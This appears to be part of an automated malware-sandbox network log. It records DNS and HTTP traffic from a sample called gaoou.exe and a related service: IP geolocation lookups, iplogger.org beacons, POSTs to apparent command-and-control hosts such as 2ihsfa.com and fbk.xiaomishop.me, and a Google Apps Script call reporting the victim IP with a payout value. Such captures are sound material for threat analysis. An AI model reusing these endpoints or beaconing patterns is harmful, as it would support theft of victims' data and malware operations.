        Set-Cookie: PHPSESSID=rr6gkc0t7f7bie2eucdhjva022; path=/; HttpOnly
        Pragma: no-cache
        Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=255615724; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Cache-Control: no-cache
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Answers:
        whoami: 5f6f374a2d0823068d51889a32317054977c188115fe1c6b1b8e036330756be6
        Strict-Transport-Security: max-age=31536000; preload
        X-Frame-Options: DENY
      • flag-unknown
        DNS
        ip-api.com
        SystemNetworkService
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-unknown
        GET
        http://ip-api.com/json/
        gaoou.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/ HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:47 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 323
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-unknown
        DNS
        www.facebook.com
        gaoou.exe
        Remote address:
        8.8.8.8:53
        Request
        www.facebook.com
        IN A
        Response
        www.facebook.com
        IN CNAME
        star-mini.c10r.facebook.com
        star-mini.c10r.facebook.com
        IN A
        157.240.221.35
      • flag-unknown
        GET
        https://www.facebook.com/
        gaoou.exe
        Remote address:
        157.240.221.35:443
        Request
        GET / HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Upgrade-Insecure-Requests: 1
        Host: www.facebook.com
        Response
        HTTP/1.1 200 OK
        content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
        Cache-Control: private, no-cache, no-store, must-revalidate
        X-Frame-Options: DENY
        X-XSS-Protection: 0
        Strict-Transport-Security: max-age=15552000; preload
        X-Content-Type-Options: nosniff
        Expires: Sat, 01 Jan 2000 00:00:00 GMT
        Vary: Accept-Encoding
        Pragma: no-cache
        x-fb-rlafr: 0
        Content-Type: text/html; charset="utf-8"
        X-FB-Debug: c7hCFUbHjwK3KM1N/w0d/old9BBuLIENOeCM5JTYd+1C6ANfzPDpo/QEj/sVxAItdedqX5PzdsV75gjGLDs0Eg==
        Date: Fri, 11 Jun 2021 17:27:50 GMT
        Transfer-Encoding: chunked
        Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
        Connection: keep-alive
      • flag-unknown
        GET
        https://www.facebook.com/
        gaoou.exe
        Remote address:
        157.240.221.35:443
        Request
        GET / HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Upgrade-Insecure-Requests: 1
        Host: www.facebook.com
        Response
        HTTP/1.1 200 OK
        content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
        Cache-Control: private, no-cache, no-store, must-revalidate
        X-Frame-Options: DENY
        X-XSS-Protection: 0
        Strict-Transport-Security: max-age=15552000; preload
        X-Content-Type-Options: nosniff
        Expires: Sat, 01 Jan 2000 00:00:00 GMT
        Vary: Accept-Encoding
        Pragma: no-cache
        x-fb-rlafr: 0
        Content-Type: text/html; charset="utf-8"
        X-FB-Debug: /ebfFmrUYjLFLZBtoBUGXzW7EB8LaKZMxMHklZpkcVnWd6UhBFCFK7qijEGeQSNL5hJgGifDLyfiYtLKpBUImg==
        Date: Fri, 11 Jun 2021 17:27:54 GMT
        Priority: u=3,i
        Transfer-Encoding: chunked
        Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
        Connection: keep-alive
      • flag-unknown
        DNS
        uyyge5w3ye.2ihsfa.com
        gaoou.exe
        Remote address:
        8.8.8.8:53
        Request
        uyyge5w3ye.2ihsfa.com
        IN A
        Response
        uyyge5w3ye.2ihsfa.com
        IN A
        88.218.92.148
      • flag-unknown
        GET
        http://uyyge5w3ye.2ihsfa.com/api/fbtime
        gaoou.exe
        Remote address:
        88.218.92.148:80
        Request
        GET /api/fbtime HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        Host: uyyge5w3ye.2ihsfa.com
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:27:56 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
        X-Powered-By: PHP/7.3.21
      • flag-unknown
        POST
        http://uyyge5w3ye.2ihsfa.com/api/?sid=39837&key=b5cf3474a00f667b3ba7c0b9846f1777
        gaoou.exe
        Remote address:
        88.218.92.148:80
        Request
        POST /api/?sid=39837&key=b5cf3474a00f667b3ba7c0b9846f1777 HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        Content-Length: 266
        Host: uyyge5w3ye.2ihsfa.com
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:27:56 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
        X-Powered-By: PHP/7.3.21
      • flag-unknown
        DNS
        script.google.com
        gaoou.exe
        Remote address:
        8.8.8.8:53
        Request
        script.google.com
        IN A
        Response
        script.google.com
        IN A
        142.250.179.206
      • flag-unknown
        GET
        https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=NL&app=Staoism&payoutcents=0.08&ver=3.5&ip=154.61.71.51
        gaoou.exe
        Remote address:
        142.250.179.206:443
        Request
        GET /macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=NL&app=Staoism&payoutcents=0.08&ver=3.5&ip=154.61.71.51 HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Host: script.google.com
      • flag-unknown
        DNS
        pki.goog
        gaoou.exe
        Remote address:
        8.8.8.8:53
        Request
        pki.goog
        IN A
        Response
        pki.goog
        IN A
        216.239.32.29
      • flag-unknown
        GET
        http://pki.goog/gsr1/gsr1.crt
        gaoou.exe
        Remote address:
        216.239.32.29:80
        Request
        GET /gsr1/gsr1.crt HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        User-Agent: Microsoft-CryptoAPI/6.1
        Host: pki.goog
        Response
        HTTP/1.1 200 OK
        Accept-Ranges: bytes
        Vary: Accept-Encoding
        Content-Type: application/pkix-cert
        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
        Cross-Origin-Resource-Policy: same-site
        Content-Length: 889
        Date: Fri, 11 Jun 2021 16:37:17 GMT
        Expires: Fri, 11 Jun 2021 17:37:17 GMT
        Last-Modified: Wed, 20 May 2020 16:45:00 GMT
        X-Content-Type-Options: nosniff
        Server: sffe
        X-XSS-Protection: 0
        Age: 3039
        Cache-Control: public, max-age=3600
      • flag-unknown
        GET
        http://ip-api.com/json/?fields=8198
        SystemNetworkService
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=8198 HTTP/1.1
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
        Host: ip-api.com
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:58 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 57
        Access-Control-Allow-Origin: *
        X-Ttl: 48
        X-Rl: 42
      • flag-unknown
        GET
        http://ip-api.com/json/?fields=8198
        SystemNetworkService
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=8198 HTTP/1.1
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
        Host: ip-api.com
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:59 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 57
        Access-Control-Allow-Origin: *
        X-Ttl: 48
        X-Rl: 41
      • flag-unknown
        GET
        http://ip-api.com/json/?fields=8198
        SystemNetworkService
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=8198 HTTP/1.1
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
        Host: ip-api.com
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:59 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 57
        Access-Control-Allow-Origin: *
        X-Ttl: 47
        X-Rl: 40
      • flag-unknown
        DNS
        fbk.xiaomishop.me
        SystemNetworkService
        Remote address:
        8.8.8.8:53
        Request
        fbk.xiaomishop.me
        IN A
        Response
        fbk.xiaomishop.me
        IN A
        104.18.9.171
        fbk.xiaomishop.me
        IN A
        104.18.8.171
      • flag-unknown
        POST
        http://fbk.xiaomishop.me/report7.4.php
        SystemNetworkService
        Remote address:
        104.18.9.171:80
        Request
        POST /report7.4.php HTTP/1.1
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
        Host: fbk.xiaomishop.me
        Content-Length: 274
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:27:59 GMT
        Content-Type: application/json; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        cf-request-id: 0a9db6da1b00000b539c8a7000000001
        Server: cloudflare
        CF-RAY: 65dc8da359870b53-AMS
      • flag-unknown
        POST
        http://fbk.xiaomishop.me/report7.4.php
        SystemNetworkService
        Remote address:
        104.18.9.171:80
        Request
        POST /report7.4.php HTTP/1.1
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
        Host: fbk.xiaomishop.me
        Content-Length: 274
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:28:00 GMT
        Content-Type: application/json; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        cf-request-id: 0a9db6dc2d00000b530aa18000000001
        Server: cloudflare
        CF-RAY: 65dc8da6ae560b53-AMS
      • flag-unknown
        POST
        http://fbk.xiaomishop.me/report7.4.php
        SystemNetworkService
        Remote address:
        104.18.9.171:80
        Request
        POST /report7.4.php HTTP/1.1
        Accept: */*
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
        Host: fbk.xiaomishop.me
        Content-Length: 250
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Date: Fri, 11 Jun 2021 17:28:00 GMT
        Content-Type: application/json; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        CF-Cache-Status: DYNAMIC
        cf-request-id: 0a9db6de6c00000b53c6b53000000001
        Server: cloudflare
        CF-RAY: 65dc8daa4b7d0b53-AMS
      • flag-unknown
        GET
        https://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=NL&app=Staoism&payoutcents=0.08&ver=3.5&ip=154.61.71.51
        gaoou.exe
        Remote address:
        142.250.179.206:443
        Request
        GET /macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=NL&app=Staoism&payoutcents=0.08&ver=3.5&ip=154.61.71.51 HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Host: script.google.com
        Response
        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
        Pragma: no-cache
        Expires: Mon, 01 Jan 1990 00:00:00 GMT
        Date: Fri, 11 Jun 2021 17:28:38 GMT
        Referrer-Policy: origin
        X-Content-Type-Options: nosniff
        X-XSS-Protection: 1; mode=block
        Server: GSE
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
        Accept-Ranges: none
        Vary: Accept-Encoding
        Transfer-Encoding: chunked
      • flag-unknown
        GET
        https://iplogger.org/18hh57
        gaoou.exe
        Remote address:
        88.99.66.31:443
        Request
        GET /18hh57 HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Host: iplogger.org
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:28:38 GMT
        Content-Type: image/png
        Transfer-Encoding: chunked
        Connection: keep-alive
        Set-Cookie: PHPSESSID=04vibme64m4rqntvs2vrh9qtb7; path=/; HttpOnly
        Pragma: no-cache
        Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=255615673; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Cache-Control: no-cache
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Answers:
        whoami: 4c38501b4c5aaf3cd2110790c1c4143772251fc8a57642aeaa13ea09d06e72a2
        Strict-Transport-Security: max-age=31536000; preload
        X-Frame-Options: DENY
      • flag-unknown
        DNS
        www.microsoft.com
        iexplore.exe
        Remote address:
        8.8.8.8:53
        Request
        www.microsoft.com
        IN A
        Response
        www.microsoft.com
        IN CNAME
        www.microsoft.com-c-3.edgekey.net
        www.microsoft.com-c-3.edgekey.net
        IN CNAME
        www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
        www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
        IN CNAME
        e13678.dscb.akamaiedge.net
        e13678.dscb.akamaiedge.net
        IN A
        104.85.1.163
      • flag-unknown
        DNS
        www.facebook.com
        gaoou.exe
        Remote address:
        8.8.8.8:53
        Request
        www.facebook.com
        IN A
        Response
        www.facebook.com
        IN CNAME
        star-mini.c10r.facebook.com
        star-mini.c10r.facebook.com
        IN A
        31.13.71.36
      • flag-unknown
        GET
        https://www.facebook.com/
        gaoou.exe
        Remote address:
        31.13.71.36:443
        Request
        GET / HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Upgrade-Insecure-Requests: 1
        Host: www.facebook.com
        Response
        HTTP/1.1 200 OK
        content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
        Cache-Control: private, no-cache, no-store, must-revalidate
        X-Frame-Options: DENY
        X-XSS-Protection: 0
        Strict-Transport-Security: max-age=15552000; preload
        X-Content-Type-Options: nosniff
        Expires: Sat, 01 Jan 2000 00:00:00 GMT
        Vary: Accept-Encoding
        Pragma: no-cache
        x-fb-rlafr: 0
        Content-Type: text/html; charset="utf-8"
        X-FB-Debug: LsU90kubaQ/6Cqgd/vI6GSiKzfDQE5Mpyp2AlEgb8fPQDuokINeARrYPu8vVTuATfIu8wya4jUnZTR1InOQ1Kw==
        Date: Fri, 11 Jun 2021 17:38:41 GMT
        Transfer-Encoding: chunked
        Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
        Connection: keep-alive
      • flag-unknown
        GET
        http://uyyge5w3ye.2ihsfa.com/api/fbtime
        gaoou.exe
        Remote address:
        88.218.92.148:80
        Request
        GET /api/fbtime HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        Host: uyyge5w3ye.2ihsfa.com
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:38:43 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
        X-Powered-By: PHP/7.3.21
      • flag-unknown
        POST
        http://uyyge5w3ye.2ihsfa.com/api/?sid=44039&key=4f9057bc0185ade96367087d96659005
        gaoou.exe
        Remote address:
        88.218.92.148:80
        Request
        POST /api/?sid=44039&key=4f9057bc0185ade96367087d96659005 HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        Content-Length: 266
        Host: uyyge5w3ye.2ihsfa.com
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:38:43 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
        X-Powered-By: PHP/7.3.21
      • flag-unknown
        GET
        https://iplogger.org/18hh57
        gaoou.exe
        Remote address:
        88.99.66.31:443
        Request
        GET /18hh57 HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Host: iplogger.org
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:38:43 GMT
        Content-Type: image/png
        Transfer-Encoding: chunked
        Connection: keep-alive
        Set-Cookie: PHPSESSID=qaghjech499d2rgamb2ptp0e86; path=/; HttpOnly
        Pragma: no-cache
        Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=255615068; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
        Cache-Control: no-cache
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        Answers:
        whoami: 4c38501b4c5aaf3cd2110790c1c4143772251fc8a57642aeaa13ea09d06e72a2
        Strict-Transport-Security: max-age=31536000; preload
        X-Frame-Options: DENY
      • flag-unknown
        DNS
        www.facebook.com
        gaoou.exe
        Remote address:
        8.8.8.8:53
        Request
        www.facebook.com
        IN A
        Response
        www.facebook.com
        IN CNAME
        star-mini.c10r.facebook.com
        star-mini.c10r.facebook.com
        IN A
        31.13.64.35
      • flag-unknown
        GET
        https://www.facebook.com/
        gaoou.exe
        Remote address:
        31.13.64.35:443
        Request
        GET / HTTP/1.1
        Connection: Keep-Alive
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        viewport-width: 1920
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: none
        Sec-Fetch-User: ?1
        Upgrade-Insecure-Requests: 1
        Host: www.facebook.com
        Response
        HTTP/1.1 200 OK
        content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
        Cache-Control: private, no-cache, no-store, must-revalidate
        X-Frame-Options: DENY
        X-XSS-Protection: 0
        Strict-Transport-Security: max-age=15552000; preload
        X-Content-Type-Options: nosniff
        Expires: Sat, 01 Jan 2000 00:00:00 GMT
        Vary: Accept-Encoding
        Pragma: no-cache
        x-fb-rlafr: 0
        Content-Type: text/html; charset="utf-8"
        X-FB-Debug: vTCiCaIbjm50W7aRzZiVumA7zTOqR+nd/gHaHnC4i/SddSDYOCjmuZPIJhJLgStzRbm0QZHUTHVoTZyMStPRcw==
        Date: Fri, 11 Jun 2021 17:48:45 GMT
        Priority: u=3,i
        Transfer-Encoding: chunked
        Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
        Connection: keep-alive
      • flag-unknown
        GET
        http://uyyge5w3ye.2ihsfa.com/api/fbtime
        gaoou.exe
        Remote address:
        88.218.92.148:80
        Request
        GET /api/fbtime HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
        Host: uyyge5w3ye.2ihsfa.com
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 11 Jun 2021 17:48:47 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Vary: Accept-Encoding
        X-Powered-By: PHP/7.3.21
      • flag-unknown
        POST
        http://uyyge5w3ye.2ihsfa.com/api/?sid=47903&key=caee0f0129dcd9ecf8d90e711e5c6ed9
        gaoou.exe
        Remote address:
        88.218.92.148:80
        Request
        POST /api/?sid=47903&key=caee0f0129dcd9ecf8d90e711e5c6ed9 HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
